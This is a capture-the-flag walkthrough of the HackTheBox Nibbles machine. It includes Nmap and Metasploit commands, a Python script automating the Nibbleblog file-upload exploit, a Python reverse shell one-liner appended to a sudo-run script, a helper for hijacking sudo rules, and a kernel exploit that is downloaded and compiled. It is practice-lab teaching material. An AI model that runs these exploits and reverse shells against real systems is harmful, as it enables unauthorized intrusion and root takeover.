Nibbles HackTheBox WalkThrough

This is the Nibbles HackTheBox machine walkthrough and the 15th machine of our OSCP-like HTB boxes series. In this writeup I demonstrate step by step how I rooted the Nibbles HTB machine in two different ways, one using Metasploit and the other without it. Before starting, let us know something about this machine. It is a Linux box with IP address 10.10.10.75 and difficulty Easy as assigned by its maker.
This machine is now retired, so you will need a VIP subscription at hackthebox.eu to access it. First, connect to the HackTheBox VPN and confirm connectivity to the Nibbles machine by pinging 10.10.10.75. If all goes well, start hacking. As usual, I began by scanning the machine with Nmap (a port scanner); the result is below.
Scanning
$ nmap -sC -sV -oN Nibbles.nmap 10.10.10.75

Nmap revealed two open ports: OpenSSH on port 22 and an Apache2 web server on port 80. Since port 80 is open there should be a website running on it, reachable at http://10.10.10.75. Browsing to it I found a nearly blank page containing only the words Hello World!. As usual, I checked the page source for a hint in the comments, and this time I found an interesting one: it mentions a directory of this site, /nibbleblog/.

Now we have a new URL to explore, http://10.10.10.75/nibbleblog/, which has the Nibbleblog CMS installed. Whenever I find a CMS, my next step is to check whether it is open source or closed source, find its version number, and then search for known vulnerabilities and exploits on exploit-db using searchsploit. If the CMS is open source we can fetch its source code from GitHub and read its directory structure and file and folder names, which saves us brute-forcing files and folders on the target: we can simply request on the target the files we see on GitHub and read what they reveal.

A quick Google search revealed that it is an open source CMS whose source code is on GitHub. After some further enumeration I got the version of this CMS at http://10.10.10.75/nibbleblog/update.php (plain HTTP; only port 80 is open on this box).

So we have Nibbleblog v4.0.3. Now we can search for available exploits for this version with searchsploit (the command-line tool for querying exploit-db).
Searching for available exploit
$ searchsploit nibbleblog 4.0.3

Searchsploit revealed that this version is affected by an arbitrary file upload vulnerability, and that a Metasploit module is available for it. Let us check the module's requirements and exploit the vulnerability using Metasploit.
$ sudo msfdb run
msf6 > search nibbleblog
msf6 > info exploit/multi/http/nibbleblog_file_upload

The Metasploit module is exploit/multi/http/nibbleblog_file_upload. It requires a username and password, but we have not enumerated any credentials so far. Since this is a CMS, just like WordPress, there should be a login panel used to manage the site. After some more enumeration I found it at http://10.10.10.75/nibbleblog/admin.php. I tried a few default credentials, admin:admin, admin:password and admin:nibbles (the machine name), and admin:nibbles worked, so we have the admin credentials. Keep such guessing short and manual: Nibbleblog temporarily blacklists an IP after a handful of failed logins, so a brute-force tool will lock you out rather than get you in. Now we can exploit the upload vulnerability to gain access to the Nibbles box. I did it in two different ways, first with Metasploit and second without. Let us get a user shell using Metasploit.
Getting User Shell Using Metasploit – Method 1
msf6 > use exploit/multi/http/nibbleblog_file_upload
msf6 exploit(multi/http/nibbleblog_file_upload) > set PAYLOAD php/meterpreter/reverse_tcp
msf6 exploit(multi/http/nibbleblog_file_upload) > set RHOSTS 10.10.10.75
msf6 exploit(multi/http/nibbleblog_file_upload) > set LHOST 10.10.14.3 # your tun0 IP
msf6 exploit(multi/http/nibbleblog_file_upload) > set TARGETURI /nibbleblog/
msf6 exploit(multi/http/nibbleblog_file_upload) > set USERNAME admin
msf6 exploit(multi/http/nibbleblog_file_upload) > set PASSWORD nibbles
msf6 exploit(multi/http/nibbleblog_file_upload) > exploit

We have got a user shell using Metasploit. Let us now exploit the same vulnerability without Metasploit. More information about this vulnerability and its PoC is in the curesec.com advisory. According to it, an authenticated attacker can upload an arbitrary script through the My Image plugin and then execute it, because the plugin saves an uploaded file with its original extension (a file uploaded as .php is stored as .php, not renamed to a harmless extension) under content/private/plugins/my_image/.

Getting User Shell Without Metasploit – Method 2
To get a user shell do the following things.
1. Log in to the admin panel at http://10.10.10.75/nibbleblog/admin.php with the credentials admin:nibbles.
2. Click Plugins in the left pane, then Configure under the My Image plugin.
3. Upload php-reverse-shell.php and click Save changes to apply. The PHP reverse shell ships with Kali in /usr/share/webshells/php/. Don't forget to replace the IP address (and the port, to match your listener) in the shell with your tun0 IP before uploading. Whatever the file was called locally, the plugin stores it as image.php.
4. Start a netcat listener on the Kali machine to accept the reverse connection from the PHP shell.
$ nc -nvlp 8888
5. Request the uploaded file to execute the shell. The curl command will hang because the PHP process is now talking to your listener; that is expected.
$ curl http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php
6. Check the user and its id after getting the shell.
$ whoami && id
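The same three steps (log in, upload through My Image, request image.php) can be scripted so the manual method is repeatable. This is an added example, not code from the original post or from Nibbleblog. It assumes the login form posts fields named username and password, and that the My Image config form posts plugin, title, position, caption and a file field named image to admin.php?controller=plugins&action=config&plugin=my_image; those field names are taken from the public Metasploit module for this bug and may need adjusting. Only the standard library is used, so it runs on a bare Kali install.

```python
"""
Method 2 scripted: log in to Nibbleblog, upload a PHP file through the My Image
plugin, then request it so it runs. Added example, not code from the original
post. Form field names are assumed from the public Metasploit module.
"""
import http.cookiejar
import sys
import urllib.parse
import urllib.request

DEFAULT_BASE = "http://10.10.10.75/nibbleblog/"
# where the plugin writes the uploaded file, keeping the .php extension
UPLOAD_PATH = "content/private/plugins/my_image/image.php"


def build_multipart(fields, file_field, filename, content, boundary="----nibbles"):
    """Hand-rolled multipart/form-data body; returns (body_bytes, content_type).

    The filename is sent as-is: the plugin saves the upload with its original
    extension, which is the whole vulnerability.
    """
    lines = []
    for name, value in fields.items():
        lines += [f"--{boundary}",
                  f'Content-Disposition: form-data; name="{name}"',
                  "", value]
    lines += [f"--{boundary}",
              f'Content-Disposition: form-data; name="{file_field}"; filename="{filename}"',
              "Content-Type: application/octet-stream", ""]
    head = ("\r\n".join(lines) + "\r\n").encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return head + content + tail, f"multipart/form-data; boundary={boundary}"


def make_opener():
    """Opener with a cookie jar so the admin session survives between requests."""
    jar = http.cookiejar.CookieJar()
    return urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))


def login(opener, base, username, password):
    """POST the credentials; True when the login form is no longer rendered.

    Success check is a heuristic (assumption): the form reappears on failure.
    Keep attempts few; the CMS blacklists an IP after repeated failed logins.
    """
    data = urllib.parse.urlencode({"username": username, "password": password}).encode()
    with opener.open(base + "admin.php", data=data) as resp:
        page = resp.read().decode(errors="replace")
    return 'name="password"' not in page


def upload_php(opener, base, php_source, filename="image.php"):
    """Upload php_source as a My Image file; returns the HTTP status code."""
    fields = {"plugin": "my_image", "title": "My image", "position": "4", "caption": ""}
    body, ctype = build_multipart(fields, "image", filename, php_source)
    query = urllib.parse.urlencode({"controller": "plugins", "action": "config", "plugin": "my_image"})
    req = urllib.request.Request(base + "admin.php?" + query, data=body,
                                 headers={"Content-Type": ctype})
    with opener.open(req) as resp:
        return resp.status


def trigger(opener, base, timeout=5):
    """GET the uploaded file. A reverse shell keeps the request open, so a
    timeout (None returned) is the success case here, not an error."""
    try:
        with opener.open(base + UPLOAD_PATH, timeout=timeout) as resp:
            return resp.status
    except Exception:
        return None


def main(argv):
    if len(argv) != 4:
        print(f"usage: {argv[0]} <base_url> <user:password> <php_file>")
        return 2
    base, creds, php_file = argv[1], argv[2], argv[3]
    if not base.endswith("/"):
        base += "/"
    user, password = creds.split(":", 1)
    with open(php_file, "rb") as f:
        php_source = f.read()  # e.g. an edited php-reverse-shell.php
    opener = make_opener()
    if not login(opener, base, user, password):
        print("login failed")
        return 1
    print("upload status:", upload_php(opener, base, php_source))
    print("trigger:", trigger(opener, base), "(None = request hung, check your listener)")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Start the netcat listener first, then run it as `python3 nibble_upload.py http://10.10.10.75/nibbleblog/ admin:nibbles shell.php`. The multipart body is built by hand rather than with a third-party library so that the one thing that matters, the unchanged `.php` filename in the file part, is visible in the code.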

We have got a user shell. Let us upgrade it to a fully interactive TTY so that we can run commands that need a terminal, such as sudo and nano, through it.
Upgrading Shell
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm
$ ^Z # press CTRL+Z to background the shell
$ stty raw -echo
$ fg # then press Enter twice to bring the shell back to the foreground

Capture User Flag
$ cat /home/nibbler/user.txt

Privilege Escalation
To escalate privileges to root we first have to find a privilege escalation vector. There are two ways to find one: run post-exploitation enumeration scripts such as LinPEAS, LinEnum or linux-exploit-suggester, or enumerate manually.
Finding PrivEsc Vector
The sudo -l command revealed that user nibbler can run /home/nibbler/personal/stuff/monitor.sh as root without a password. That means anything we put inside monitor.sh runs as root: nibbler cannot run, say, python3 as root directly, but a line that launches python3 from inside monitor.sh executes as root when the script is run with sudo, and no password is asked for.
$ sudo -l

monitor.sh is inside the personal.zip archive, so we have to unzip personal.zip to get it. If you don't want to unzip the archive you can simply create your own monitor.sh in personal/stuff/, but you have to create the personal and stuff directories as well, because they do not exist yet and the sudo rule only matches that exact path. I am going to use the monitor.sh I got from unzipping personal.zip.
$ unzip personal.zip

The monitor.sh script is readable, writable and executable by user nibbler (rwx permissions), as find shows.
$ find . -ls

Since nibbler can modify this file, he can put reverse shell code into it; when the file is run as root the reverse shell also runs as root, and we get a root shell on our netcat listener. I did exactly that and got a root shell. So our privilege escalation vector here is abuse of the sudo right.
This box is also vulnerable to a kernel exploit, which I learned when I ran linux-exploit-suggester to find privilege escalation vectors; see CVE-2017-16995 for details. So we have two ways to root this box, and that is what we do next: first by abusing the sudo right and second with the kernel exploit.

Getting Root Shell via Sudo Right Exploitation – Method 1
To get a root shell I did the following things.
On Kali Machine
1. Started a netcat listener.
$ nc -nvlp 1234
On Nibbles Machine
2. Changed directory to personal/stuff/ (make sure you have already extracted personal.zip or created monitor.sh there).
3. Appended the following reverse shell line to monitor.sh. The sudo in front of python3 is redundant, since the script already runs as root, but it is harmless.
sudo python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.3",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
4. Ran the script as root. The terminal hangs while the reverse connection is open; ignore any connection time-out message.
$ cd personal/stuff/
$ nano monitor.sh
$ grep -i "sudo python3" monitor.sh # confirm the line was saved
$ sudo -u root ./monitor.sh
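The check and the hijack described above, generalised a little: parse the output of sudo -l, pull out the commands that run as another user, and report which of them we can tamper with, either because the file is writable or because it does not exist yet and we can create it (the Nibbles case, where personal/stuff/monitor.sh is absent until personal.zip is unpacked). This is an added example, not code from the original post. SAMPLE_SUDO_L is constructed to mirror the shape of real sudo -l output; the monitor.sh path is the one used on this box.

```python
"""
Sudo-rights checker and script hijack helper. Added example, not code from the
original post. SAMPLE_SUDO_L is constructed sample output.
"""
import os
import re
import subprocess
import tempfile

SAMPLE_SUDO_L = """\
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
"""

# Matches "(root) NOPASSWD: /path/to/cmd" style lines. Only absolute-path
# rules are considered; a bare ALL is a different (and easier) case.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:\w+:\s*)*)(?P<cmd>/\S+)", re.M)


def parse_sudo_rules(text):
    """Return a list of (runas, nopasswd, command_path) tuples."""
    return [(m.group("runas"), "NOPASSWD" in m.group("tags"), m.group("cmd"))
            for m in RULE_RE.finditer(text)]


def writable_targets(rules):
    """Rules we can hijack, as (runas, nopasswd, cmd, reason)."""
    hits = []
    for runas, nopasswd, cmd in rules:
        if os.path.isfile(cmd) and os.access(cmd, os.W_OK):
            hits.append((runas, nopasswd, cmd, "file writable"))
        elif not os.path.exists(cmd):
            # walk up to the nearest existing ancestor; if that directory is
            # writable we can create the whole missing path ourselves
            parent = os.path.dirname(cmd)
            while not os.path.exists(parent):
                parent = os.path.dirname(parent)
            if os.access(parent, os.W_OK):
                hits.append((runas, nopasswd, cmd, f"missing, creatable under {parent}"))
    return hits


def stage_script(path, payload):
    """Write the hijacked script: shebang, our payload, execute bit.

    The shebang tells the kernel which interpreter to run the file with and
    the x bit is needed for sudo to execute it at all.
    """
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as f:
        f.write("#!/bin/bash\n" + payload + "\n")
    os.chmod(path, 0o755)
    return path


def demo():
    """Dry run in a throwaway directory; returns (hits_before, hits_after)."""
    root = tempfile.mkdtemp()
    target = os.path.join(root, "personal", "stuff", "monitor.sh")
    rule = [("root", True, target)]
    before = writable_targets(rule)            # path missing, parent writable
    stage_script(target, "id > /tmp/proof.txt")  # placeholder payload
    after = writable_targets(rule)             # now an existing writable file
    return before, after


if __name__ == "__main__":
    # -n: never prompt. Falls back to the constructed sample if sudo is absent
    # or refuses to list without a password.
    try:
        out = subprocess.run(["sudo", "-n", "-l"], capture_output=True, text=True).stdout
    except FileNotFoundError:
        out = ""
    for hit in writable_targets(parse_sudo_rules(out or SAMPLE_SUDO_L)):
        print(hit)
```

On the box itself, replace the placeholder payload in stage_script with the reverse shell line from step 3 and run `sudo -u root /home/nibbler/personal/stuff/monitor.sh` afterwards; the "missing, creatable under" case is exactly why creating the personal/stuff directories by hand works when you skip unzipping personal.zip.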

We are root now.
Getting Root Shell via Kernel Exploit – Method 2
To get a root shell via the kernel exploit I did the following things.
On Kali Machine
1. Downloaded the exploit from exploit-db.
2. Started a Python HTTP server to host the file.
$ curl https://www.exploit-db.com/download/45010 -o exploit.c
$ sudo python3 -m http.server 80

On Nibbles Machine
3. Changed directory to a world-writable directory, /dev/shm.
4. Downloaded the exploit from my Kali machine.
5. Compiled the exploit (gcc is present on this box).
6. Finally ran it. A kernel exploit can crash or freeze the box instead of giving a shell, so on a real engagement prefer the sudo path and use this one only when you can afford a reset.
$ cd /dev/shm
$ wget http://10.10.14.3/exploit.c
$ gcc exploit.c
$ ./a.out
# whoami

We have successfully got root. Let us capture the root flag.
Capture Root Flag
# cat /root/root.txt

This was how I rooted the Nibbles HackTheBox machine. I learnt a lot during this challenge and hope you have learnt something new too. Thanks for reading this walkthrough. Share your experience in the comment section. For any query or suggestion about the writeup, feel free to write to us at [email protected].
